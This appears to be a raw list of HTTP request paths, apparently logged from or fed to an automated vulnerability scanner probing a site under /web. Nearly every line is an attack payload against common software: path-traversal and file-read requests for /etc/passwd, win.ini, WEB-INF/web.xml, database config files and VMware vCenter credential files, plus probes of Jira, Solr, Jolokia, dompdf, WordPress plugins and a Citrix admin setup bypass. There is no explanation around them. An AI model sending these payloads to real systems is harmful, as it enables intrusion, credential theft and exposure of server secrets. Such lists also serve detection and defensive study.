/web
/web/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/web/maint/index.php?packages
/web/fileDownload?action=downloadBackupFile
/web/druid/indexer/v1/sampler?for=connect
/web/
/web/sys/ui/extend/varkind/custom.jsp
/web/include/thumb.php?dir=http/.....///.....///config/config_db.php
/web/
/web/sys/ui/extend/varkind/custom.jsp
/web
/web/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/web/maint/index.php?packages
/web/include/thumb.php?dir=.....///http/.....///config/config_db.php
/web/sys/ui/extend/varkind/custom.jsp
/web/fw/mindex.do?url=./WEB-INF/web.xml%3f
/web/fileDownload?action=downloadBackupFile
/web/include/thumb.php?dir=.....///http/.....///config/config_db.php
/web/css_parser.php?css=css_parser.php
/web/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx
/web/fileDownload?action=downloadBackupFile
/web/fileDownload?action=downloadBackupFile
/web/etc/passwd
/web/css_parser.php?css=css_parser.php
/web/fileDownload?action=downloadBackupFile
/web/solr/admin/cores?wt=json
/web/interlib/report/ShowImage?localPath=C:\Windows\system.ini
/web/solr/admin/cores?wt=json
/web/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
/web/s/25SmlC6IrYR8wkOrNsotmEXEbQW/_/;/WEB-INF/web.xml
/web/public/index.php/home/file/user_pics
/web/NCFindWeb?service=IPreAlertConfigService&filename=
/web/?a=display&templateFile=README.md
/web/ispirit/interface/gateway.php
/web/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
/web/s/25SmlC6IrYR8wkOrNsotmEXEbQW/_/;/WEB-INF/web.xml
/web/s/25SmlCBaB8RLQLGPa4rDrRd5R0O/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/web/s/25SmlCBaB8RLQLGPa4rDrRd5R0O/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/web/public/index.php/home/file/user_pics
/web/NCFindWeb?service=IPreAlertConfigService&filename=
/web/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open
/web/ispirit/interface/gateway.php
/web/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd
/web/rest/tinymce/1/macro/preview
/web/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml
/web/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/s/25Sml3BPRozBhbnVa6uGBiJaOAl/_/;/WEB-INF/web.xml
/web/lib///....//....//....//....//....//....//....//....//etc//passwd
/web/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open
/web/s/25SmlHixpZ5O63a6hC6oebbxPGn/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/web/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd
/web/rest/tinymce/1/macro/preview
/web/s/25SmlHixpZ5O63a6hC6oebbxPGn/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/web/phpwiki/index.php/passwd
/web/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml
/web/lib///....//....//....//....//....//....//....//....//etc//passwd
/web/wp-content/plugins/wp-payeezy-pay/donate.php
/web/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
/web/jars/upload
/web/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
/web/filemanager/upload.php
/web/casmain.xgi
/web/(download)/etc/passwd
/web/fcgi-bin/wgsetcgi
/web/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
/web/assets/file:%2f%2f/etc/passwd
/web/
/web/language/lang
/web/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
/web/filemanager/upload.php
/web/menu/ss?sid=nsroot&username=nsroot&force_setup=1
/web/menu/neo
/web/casmain.xgi
/web/menu/stc
/web/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
/web/(download)/etc/passwd
/web/fcgi-bin/wgsetcgi
/web/eam/vib?id=C:\ProgramData\VMware\VMware+VirtualCenter\vcdb.properties
/web/eam/vib?id=C:\Documents+and+Settings\All+Users\Application+Data\VMware\VMware+VirtualCenter\vcdb.properties
/web/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
/web/dompdf.php?input_file=dompdf.php
/web/language/lang
/web/menu/stc
/web/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
/web/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
/web/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
/web/dompdf.php?input_file=dompdf.php
/web/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php
/web/lib/dompdf/dompdf.php?input_file=dompdf.php
/web/cgi-bin/logoff.cgi
/web/cgi-bin/webproc
/web/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
/web/lib/dompdf/dompdf.php?input_file=dompdf.php
/web/includes/dompdf/dompdf.php?input_file=dompdf.php
/web/login
/web/viewlog.jsp
/web/cgi-bin/webproc
/web/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
/web/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
/web/.//WEB-INF/classes/META-INF/microprofile-config.properties
/web/uir//etc/passwd
/web/etc/passwd
/web/login
/web/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
/web/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
/web/uir//etc/passwd
/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
